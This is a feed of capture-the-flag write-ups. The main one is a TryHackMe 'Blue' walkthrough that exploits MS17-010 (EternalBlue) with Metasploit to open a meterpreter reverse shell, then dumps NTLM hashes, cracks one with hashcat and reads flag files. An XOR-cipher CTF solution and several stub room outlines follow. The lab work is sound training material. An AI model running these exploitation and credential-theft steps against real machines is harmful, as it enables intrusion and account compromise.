What command allows us to get a "golden ticket"?

meterpreter > help
Kiwi Commands
=============

    Command                Description
    -------                -----------
    golden_ticket_create   Create a golden kerberos ticket

Answer: golden_ticket_create

TryHackMe Blue

Omri Bornstein — Tue, 11 May 2021 07:08:53 +0000

TryHackMe Blue

References

Hammond, J. (2020). TryHackMe! EternalBlue/MS17-010 in Metasploit [YouTube Video]. In YouTube. https://youtu.be/s6rwS7UuMt8
Microsoft. (2017, October 11). Microsoft Security Bulletin MS17-010 - Critical. Microsoft.com. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

Recon

How many ports are open with a port number under 1000?

$ nmap -sV -sC <MACHINE_IP>
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-11 08:23 AEST
Nmap scan report for <MACHINE_IP>
Host is up (0.28s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2021-05-10T22:25:26+00:00
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2021-05-09T22:21:54
|_Not valid after:  2021-11-08T22:21:54
|_ssl-date: 2021-05-10T22:25:33+00:00; -1s from scanner time.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h14m10s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:22:ad:0b:95:87 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-10T17:25:26-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-10T22:25:26
|_  start_date: 2021-05-10T22:21:53

Answer: 3

What is this machine vulnerable to (answer in the form of: `ms??-???`)?

According to Microsoft, the EternalBlue vulnerability has been given the codename ms17-010.

Answer: ms17-010

Gain Access

What is the full path of the exploitation code we will run against the machine?

msf6 > search eternalblue

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value?

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.14     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

Answer: RHOSTS

Use the exploit/windows/smb/ms17_010_eternalblue module.
Set LHOST to your OpenVPN IP.
Set RHOSTS to the server's IP.
Start the exploit.

$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => <OPENVPN_IP>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <MACHINE_IP>
RHOSTS => <MACHINE_IP>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on <OPENVPN_IP>:4444 
[*] <MACHINE_IP>:445 - Executing automatic check (disable AutoCheck to override)
[*] <MACHINE_IP>:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] <MACHINE_IP>:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] <MACHINE_IP>:445     - Scanned 1 of 1 hosts (100% complete)
[+] <MACHINE_IP>:445 - The target is vulnerable.
[*] <MACHINE_IP>:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] <MACHINE_IP>:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] <MACHINE_IP>:445     - Scanned 1 of 1 hosts (100% complete)
[*] <MACHINE_IP>:445 - Connecting to target for exploitation.
[+] <MACHINE_IP>:445 - Connection established for exploitation.
[+] <MACHINE_IP>:445 - Target OS selected valid for OS indicated by SMB reply
[*] <MACHINE_IP>:445 - CORE raw buffer dump (42 bytes)
[*] <MACHINE_IP>:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] <MACHINE_IP>:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] <MACHINE_IP>:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] <MACHINE_IP>:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] <MACHINE_IP>:445 - Trying exploit with 12 Groom Allocations.
[*] <MACHINE_IP>:445 - Sending all but last fragment of exploit packet
[*] <MACHINE_IP>:445 - Starting non-paged pool grooming
[+] <MACHINE_IP>:445 - Sending SMBv2 buffers
[+] <MACHINE_IP>:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] <MACHINE_IP>:445 - Sending final SMBv2 buffers.
[*] <MACHINE_IP>:445 - Sending last fragment of exploit packet!
[*] <MACHINE_IP>:445 - Receiving response from exploit packet
[+] <MACHINE_IP>:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] <MACHINE_IP>:445 - Sending egg to corrupted connection.
[*] <MACHINE_IP>:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to <MACHINE_IP>
[*] Meterpreter session 1 opened (<OPENVPN_IP>:4444 -> <MACHINE_IP>:49173) at 2021-05-11 16:16:09 +1000
[+] <MACHINE_IP>:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] <MACHINE_IP>:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] <MACHINE_IP>:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Escalate

What is the name of the post module we will use?

Answer: post/multi/manage/shell_to_meterpreter

Show options, what option are we required to change?

Answer: SESSION

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 600   692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 644   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 688   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 724   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1000  644   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 1020  692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM
 1064  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1164  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 1276  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1312  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 1364  816   WmiPrvSE.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wbem\wmiprvse.exe
 1392  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
 1468  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\XenTools\LiteAgent.exe
 1612  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
 1720  724   taskeng.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\taskeng.exe
 1828  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM
 1936  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE
 2008  692   taskhost.exe          x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\taskhost.exe
 2084  816   WmiPrvSE.exe
 2324  692   mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2384  692   mscorsvw.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2420  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE
 2648  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM
 2768  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM
 2788  2324  mscorsvw.exe          x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2968  544   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\conhost.exe
 2984  1276  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe

meterpreter > migrate -N winlogon.exe
[*] Migrating from 1276 to 644...
[*] Migration completed successfully.
meterpreter >

Cracking

What is the name of the non-default user?

In a meterpreter shell, the hashdump command can be used to get the users' password hashes.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Answer: Jon

What is the cracked password?

In hashcat:
- -D 2 is used to use the GPU for hash cracking.
- -m 1000 is used to crack Windows NTLM hash

$ hashcat -D 2 -m 1000 'ffb43f0de35be4d9917ac0cc8ad57f8d' rockyou.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Tue May 11 16:49:03 2021 (6 secs)
Time.Estimated...: Tue May 11 16:49:09 2021 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  1844.3 kH/s (7.92ms) @ Accel:128 Loops:1 Thr:8 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10223616/14344384 (71.27%)
Rejected.........: 0/10223616 (0.00%)
Restore.Point....: 10174464/14344384 (70.93%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#2....: amby6931 -> alisonodonnell1

Answer: alqfna22

Find flags!

Flag1? This flag can be found at the system root.

meterpreter > pwd
C:\Windows\system32
meterpreter > cd C:/
meterpreter > dir
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2009-07-14 13:18:56 +1000  $Recycle.Bin
40777/rwxrwxrwx   0       dir   2009-07-14 15:08:56 +1000  Documents and Settings
40777/rwxrwxrwx   0       dir   2009-07-14 13:20:08 +1000  PerfLogs
40555/r-xr-xr-x   4096    dir   2009-07-14 13:20:08 +1000  Program Files
40555/r-xr-xr-x   4096    dir   2009-07-14 13:20:08 +1000  Program Files (x86)
40777/rwxrwxrwx   4096    dir   2009-07-14 13:20:08 +1000  ProgramData
40777/rwxrwxrwx   0       dir   2018-12-13 14:13:22 +1100  Recovery
40777/rwxrwxrwx   4096    dir   2018-12-13 10:01:17 +1100  System Volume Information
40555/r-xr-xr-x   4096    dir   2009-07-14 13:20:08 +1000  Users
40777/rwxrwxrwx   16384   dir   2009-07-14 13:20:08 +1000  Windows
100666/rw-rw-rw-  24      fil   2018-12-13 14:47:39 +1100  flag1.txt
0000/---------    455120  fif   1970-01-09 06:27:28 +1000  hiberfil.sys
0000/---------    455120  fif   1970-01-09 06:27:28 +1000  pagefile.sys

meterpreter > cat flag1.txt 
flag{access_the_machine}

Flag 1: flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

meterpreter > cd C:/Windows/System32/config
meterpreter > dir
Listing: C:\Windows\System32\config
===================================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100666/rw-rw-rw-  28672     fil   2009-07-14 15:32:39 +1000  BCD-Template
100666/rw-rw-rw-  25600     fil   2009-07-14 15:38:35 +1000  BCD-Template.LOG
100666/rw-rw-rw-  18087936  fil   2009-07-14 12:34:08 +1000  COMPONENTS
100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:31 +1000  COMPONENTS.LOG
100666/rw-rw-rw-  13312     fil   2009-07-14 12:34:08 +1000  COMPONENTS.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  COMPONENTS.LOG2
100666/rw-rw-rw-  1048576   fil   2021-05-11 16:12:23 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.0.regtrans-ms
100666/rw-rw-rw-  1048576   fil   2021-05-11 16:12:23 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.1.regtrans-ms
100666/rw-rw-rw-  1048576   fil   2021-05-11 16:12:24 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.2.regtrans-ms
100666/rw-rw-rw-  65536     fil   2021-05-11 16:12:23 +1000  COMPONENTS{016888b8-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
100666/rw-rw-rw-  65536     fil   2009-07-14 14:54:56 +1000  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2009-07-14 14:54:56 +1000  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2009-07-14 14:54:56 +1000  COMPONENTS{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  DEFAULT
100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:31 +1000  DEFAULT.LOG
100666/rw-rw-rw-  177152    fil   2009-07-14 12:34:08 +1000  DEFAULT.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  DEFAULT.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-18 09:22:09 +1100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  DEFAULT{016888b5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0         dir   2009-07-14 13:20:10 +1000  Journal
40777/rwxrwxrwx   4096      dir   2009-07-14 13:20:10 +1000  RegBack
100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SAM
100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:31 +1000  SAM.LOG
100666/rw-rw-rw-  21504     fil   2009-07-14 12:34:08 +1000  SAM.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SAM.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-18 09:22:09 +1100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SAM{016888c1-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SECURITY
100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:30 +1000  SECURITY.LOG
100666/rw-rw-rw-  21504     fil   2009-07-14 12:34:08 +1000  SECURITY.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SECURITY.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-18 09:22:08 +1100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-18 09:22:09 +1100  SECURITY{016888c5-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  40632320  fil   2009-07-14 12:34:08 +1000  SOFTWARE
100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:30 +1000  SOFTWARE.LOG
100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SOFTWARE.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SOFTWARE.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-18 09:21:18 +1100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:18 +1100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:18 +1100  SOFTWARE{016888c9-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  12582912  fil   2009-07-14 12:34:08 +1000  SYSTEM
100666/rw-rw-rw-  1024      fil   2009-07-14 17:07:30 +1000  SYSTEM.LOG
100666/rw-rw-rw-  262144    fil   2009-07-14 12:34:08 +1000  SYSTEM.LOG1
100666/rw-rw-rw-  0         fil   2009-07-14 12:34:08 +1000  SYSTEM.LOG2
100666/rw-rw-rw-  65536     fil   2019-03-18 09:21:15 +1100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:15 +1100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288    fil   2019-03-18 09:21:15 +1100  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   4096      dir   2009-07-14 13:20:10 +1000  TxR
100666/rw-rw-rw-  34        fil   2018-12-13 14:48:22 +1100  flag2.txt
40777/rwxrwxrwx   4096      dir   2009-07-14 13:20:10 +1000  systemprofile

meterpreter > cat flag2.txt 
flag{sam_database_elevated_access}

Flag 2: flag{sam_database_elevated_access}

Flag3?

meterpreter > search -f flag*.txt
Found 3 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter > cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}

Flag 3: flag{admin_documents_can_be_valuable}

ångstromCTF Exclusive Cipher

Omri Bornstein — Mon, 03 May 2021 12:36:06 +0000

ångstromCTF 2021 Exclusive Cipher

References

Szymański, Ł. (2021). ångstromCTF 2021: Exclusive Cipher. szymanski.ninja. https://szymanski.ninja/en/ctfwriteups/2021/angstromctf/exclusive-cipher/

Question

Clam decided to return to classic cryptography and revisit the XOR cipher! Here's some hex encoded ciphertext:

ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c

The key is 5 bytes long, and the flag is somewhere in the message.

Analysis

Assuming 2 hexadecimal digits are equivalent to 1 ASCII characters, a possible key can be found by XORing the ciphertext with the known 5-bytes long substring actf{.

Solution

In an XOR Cipher, it is known that possible_key = ciphertext ^ known_cleartext. The python script attached:

slices the ciphertext to all possible 5 characters-long (assuming 2 hexadecimal digits are equivalent to 1 ASCII characters) sections,
computes possible_key = ciphertext ^ known_cleartext, for a known substring of actf{,
expands the key to the ASCII length of the message,
rotates the key to deal with cases where the known clear text is not in an index that is a multiple of the key length.
- Thanks to @Levon for this suggestion.
recomputes the XOR to possibly decode the message
and prints the possible message as ASCII.

Initial Python Code

from typing import List
from doctest import testmod
from textwrap import wrap


def xor(s: List[int], t: List[int]) -> List[int]:
    """
    :param s: list of non-negative integers
    :param t: list of non-negative integers
    :return: XOR of the ith number of both lists
    """
    return [a ^ b for a, b in zip(s, t)]


def expand_key(short_key: List[int], size: int) -> List[int]:
    """
    :param short_key: list of non-negative integers
    :param size: positive integer
    :return: short_key * (size // len(short_key)) + short_key[:size - len(key_expanded)]

    >>> expand_key([1, 2, 3, 4, 5], 9)
    [1, 2, 3, 4, 5, 1, 2, 3, 4]
    """
    assert size > len(short_key)
    key_expanded = short_key * (size // len(short_key))
    for ii in range(size - len(key_expanded)):
        key_expanded.append(short_key[ii])
    return key_expanded


ciphertext_text = input("hex-encoded ciphertext: ")
known_cleartext = input("known cleartext (with length of key): ")
hint = input("hint (such as 'flag'): ")

cipher_ascii = [int(letter, 16) for letter in wrap(ciphertext_text, 2)]
known_cleartext_ascii = [ord(letter) for letter in known_cleartext]

for i in range(len(cipher_ascii) - len(known_cleartext)):
    key = xor(cipher_ascii[i:i + len(known_cleartext)], known_cleartext_ascii)
    expanded_key = expand_key(key, len(cipher_ascii))
    message_ascii = xor(cipher_ascii, expanded_key)
    message_text = "".join(map(chr, message_ascii))
    if known_cleartext in message_text and hint in message_text:
        print(f"key: {key} ('{''.join(map(chr, key))}')")
        print(f"message: {message_text}")
        print()

Improved Python Code

from typing import TypedDict, List
from textwrap import wrap
from pwn import xor

class XORSolution(TypedDict):
    key: List[int]
    cleartext: str


def decode_xor(ciphertext_hex: str, known_cleartext: str, hint: str) -> List[XORSolution]:
    output = []
    cipher_ascii = bytes(int(letter, 16) for letter in wrap(ciphertext_hex, 2))
    for i in range(len(cipher_ascii)):
        key = list(xor(cipher_ascii[i:i + len(known_cleartext)], known_cleartext.encode()))
        for ii in range(len(key)):
            rotated_key = key[-ii:] + key[:-ii]
            cleartext = str(xor(cipher_ascii, rotated_key))[2:-1]
            if known_cleartext in cleartext and hint in cleartext:
                output.append({"key": rotated_key, "cleartext": cleartext})
    return output

Python Script Output

A Python script that prints all valid solutions for the full ciphertext and the ciphertext without the first character:

ciphertext_hex1 = "ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c"
known_cleartext1 = "actf{"
hint1 = "flag"

for solution in decode_xor(ciphertext_hex1, known_cleartext1, hint1):
    print(f"key: {solution['key']})")
    print(f"message: {solution['cleartext']}")

for solution in decode_xor(ciphertext_hex1[2:], known_cleartext1, hint1):
    print(f"key: {solution['key']})")
    print(f"message: {solution['cleartext']}")

The output of the screen described immediately above:

key: [237, 72, 133, 93, 102])
message: Congratulations on decrypting the message! The flag is actf{who_needs_aes_when_you_have_xor}. Good luck on the other crypto!
key: [72, 133, 93, 102, 237])
message: ongratulations on decrypting the message! The flag is actf{who_needs_aes_when_you_have_xor}. Good luck on the other crypto!

Flag: actf{who_needs_aes_when_you_have_xor}

DEV Community: Omri Bornstein

TryHackMe OhSINT

TryHackMe OhSINT

References

What is this users avatar of?

What city is this person in?

Whats the SSID of the WAP he connected to?

Where has he gone on holiday?

What is this persons password?

TryHackMe The find Command

TryHackMe The find Command

References

Be more specific

Find all files whose name ends with .xml

Find all files in the /home directory (recursive) whose name is user.txt (case insensitive)

Find all directories whose name contains the word exploits:

Know exactly what you're looking for

Find all files owned by the user kittycat

Find all files that are exactly 150 bytes in size

Find all files in the /home directory (recursive) with size less than 2 KiB and extension .txt

Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format)

Find all files that are only readable by anyone (use octal format)

Find all files with write permission for the group others, regardless of any other permissions, with extension .sh (use symbolic format)

Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)

Find all files that were not accessed in the last 10 days with extension .png

Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours

TryHackMe TShark

TryHackMe TShark

References

Reading PCAP Files

How many packets are in the dns.cap file?

How many A records are in the capture (including responses)?

Which A record was present the most?

DNS Exfil

How many packets are in this capture?

How many DNS queries are in this PCAP (excluding responses)?

What is the DNS transaction ID of the suspicious queries (in hex)?

What is the string extracted from the DNS queries?

What is the flag?

TryHackMe HTTP in Detail

TryHackMe HTTP in Detail

References

What is HTTP(S)?

What does HTTP stand for?

What does the S in HTTPS stand for?

On the mock webpage on the right there is an issue, once you've found it, click on it. What is the challenge flag?

Requests & Responses

Example Request:

Example Response:

What HTTP protocol is being used in the above example?

What response header tells the browser how much data to expect?

HTTP Methods

What method would be used to create a new user account?

POST Request

What method would be used to update your email address?

PUT Request

What method would be used to remove a picture you've uploaded to your account?

DELETE Request

What method would be used to view a news article?

GET Request

HTTP Status Codes

What response code might you receive if you've created a new user or blog post article?

What response code might you receive if you've tried to access a page that doesn't exist?

What response code might you receive if the web server cannot access its database and the application crashes?

What response code might you receive if you try to edit your profile without logging in first?

Headers

What header tells the web server what browser is being used?

What header tells the browser what type of data is being returned?

What header tells the web server which website is being requested?

Cookies

Which header is used to save cookies to your computer?

Making Requests

Make a GET request to /room

Make a GET request to /blog and using the gear icon set the id parameter to 1 in the URL field

Make a DELETE request to /user/1

Make a PUT request to /user/2 with the username parameter set to admin

POST the username of thm and a password of letmein to /login

TryHackMe DNS in Detail

TryHackMe DNS in Detail

References

TryHackMe The `find` Command

Find all files whose name ends with `.xml`

Find all files in the `/home` directory (recursive) whose name is `user.txt` (case insensitive)

Find all directories whose name contains the word `exploits`:

Find all files owned by the user `kittycat`

